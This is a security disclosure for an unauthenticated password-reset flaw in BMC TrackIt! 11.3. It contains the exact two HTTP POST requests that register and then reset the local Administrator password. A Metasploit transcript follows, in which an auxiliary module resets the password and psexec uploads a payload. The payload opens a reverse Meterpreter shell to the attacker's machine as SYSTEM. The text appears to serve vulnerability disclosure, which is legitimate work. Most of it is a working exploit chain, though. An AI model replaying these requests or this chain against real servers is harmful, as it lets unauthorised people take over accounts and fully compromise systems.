BMC TrackIt! 11.3 Unauthenticated Local User Password Change

`BMC TrackIt! 11.3 Unauthenticated Local User Password Change  
Trial available here: http://www.trackit.com  
  
A Metasploit pull request has been made here:  
https://github.com/rapid7/metasploit-framework/pull/4359  
  
BMC TrackIt! 11.3 when installed with TrackItWeb! allows an unauthenticated  
user to change any local user's password, such as Administrator. If the  
ability to log in remotely via SMB is enabled on the server, this can yield  
an unauthenticated user a shell of SYSTEM using the psexec module in  
Metasploit. This was tested against Windows Server 2008 R2 in a relatively  
default (trackit installs SQL server) installation. A domain was set up and  
the web server was added to the domain. Domain credentials were not able to  
be set, only local users.  
  
Using the Registration link in the top right of the  
/PasswordReset/Application/Main page, the UI requires the user's password  
to continue. However, the request made after to actually register the local  
user is disparate from the authentication request and can be sent  
independently. This allows an unauthenticated user to now reset that user's  
password. Because the Password Reset form makes a separate distinct request  
to check the answers to the secret question, the request to actually change  
a user's password can be made as any user.  
  
The first request looks like:  
  
POST /PasswordReset/Application/Register HTTP/1.1  
Host: 192.168.1.57  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:26.0)  
Gecko/20100101 Firefox/26.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Referer: http://192.168.1.57/PasswordReset  
Content-Length: 318  
Cookie: ASP.NET_SessionId=oyxdhg2obxlcxv30p2z0heot  
Connection: keep-alive  
Pragma: no-cache  
Cache-Control: no-cache  
  
domainname=WIN-P3AET0NFP1N&userName=Administrator&emailaddress=fdjhsahjfd%  
40fdsafdsa.com  
&userQuestions=[{"Id":1,"Answer":"not"},{"Id":2,"Answer":"not"}]&updatequesChk=false&SelectedQuestion=1&SelectedQuestion=2&answer=not&answer=not&confirmanswer=not&confirmanswer=not  
  
A valid ASP.NET_SessionId is required in that a GET to the /PasswordReset/  
and using the subsequent Set-Cookie in all subsequent requests as the  
cookie. The domainname parameter can the the name of the computer, which is  
the default value on the registration page. The userName parameter is the  
user to register with the application. You can attempt this is with a user  
already registered with no issue (though probably changing the secret  
answers to known values is probably bad too).  
  
The second request looks like this:  
  
POST /PasswordReset/Application/ResetPassword HTTP/1.1  
Host: 192.168.1.57  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:26.0)  
Gecko/20100101 Firefox/26.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Referer: http://192.168.1.57/PasswordReset/Application/Main  
Content-Length: 92  
Cookie: ASP.NET_SessionId=oyxdhg2obxlcxv30p2z0heot; UserName=Administrator  
Connection: keep-alive  
Pragma: no-cache  
Cache-Control: no-cache  
  
newPassword=n0tpassw0rd!&domain=WIN-P3AET0NFP1N&UserName=Administrator&CkbResetpassword=true  
  
The domain and UserName parameters should match those supplied in the  
previous registration request. The newPassword parameter will need to meet  
any local standard enforced by GPO.  
  
Combining these two requests will allow an unauthorised user to register a  
local user to be elegible for a password reset via the password reset form,  
then take advantage of the subsequent password reset vulnerability to  
change the password of any local user, including Administrator.  
  
Supplied is a metasploit auxiliary module which will change the password of  
the Administrator user by default, then print the domain, username, and  
password to user with psexec in order to log in over SMB.  
  
The below Metasploit run details changing the password with the attached  
module. Setting the password to the one reported by the auxiliary module,  
psexec is run again and a shell as NT USER/SYSTEM is gained.  
  
  
msf auxiliary(bmc_trackit_pwd_reset) > show options  
  
Module options (auxiliary/gather/bmc_trackit_pwd_reset):  
  
Name Current Setting Required Description  
---- --------------- -------- -----------  
DOMAIN no The domain of the user. By default  
the local user's computer name will be autodetected  
LOCALUSER Administrator yes The local user to change password  
for  
Proxies no Use a proxy chain  
RHOST 192.168.1.57 yes The target address  
RPORT 80 yes The target port  
TARGETURI / yes The path to BMC TrackIt  
VHOST no HTTP server virtual host  
  
msf auxiliary(bmc_trackit_pwd_reset) > run  
  
[*] Please run the psexec module using:  
[*] WIN-P3AET0NFP1N\Administrator:qGSvnJeuNO!1  
[*] Auxiliary module execution completed  
msf auxiliary(bmc_trackit_pwd_reset) > use exploit/windows/smb/psexec  
  
msf exploit(psexec) >  
msf exploit(psexec) > set SMBPass qGSvnJeuNO!1  
SMBPass => qGSvnJeuNO!1  
msf exploit(psexec) > exploit  
  
[*] Started reverse handler on 192.168.1.31:4444  
[*] Connecting to the server...  
[*] Authenticating to 192.168.1.57:445|WORKGROUP as user 'Administrator'...  
[*] Uploading payload...  
[*] Created \fNRBQEMV.exe...  
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.57[\svcctl]  
...  
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.57[\svcctl]  
...  
[*] Obtaining a service manager handle...  
[*] Creating a new service (NOAlMwJR - "MBvX")...  
[*] Closing service handle...  
[*] Opening service...  
[*] Starting the service...  
[*] Removing the service...  
[*] Closing service handle...  
[*] Deleting \fNRBQEMV.exe...  
[*] Sending stage (769024 bytes) to 192.168.1.57  
[*] Meterpreter session 4 opened (192.168.1.31:4444 -> 192.168.1.57:50668)  
at 2014-10-12 00:44:12 -0500  
  
meterpreter > getuid  
Server username: NT AUTHORITY\SYSTEM  
meterpreter >  
  
--   
http://volatile-minds.blogspot.com -- blog  
http://www.volatileminds.net -- website  
  
  
`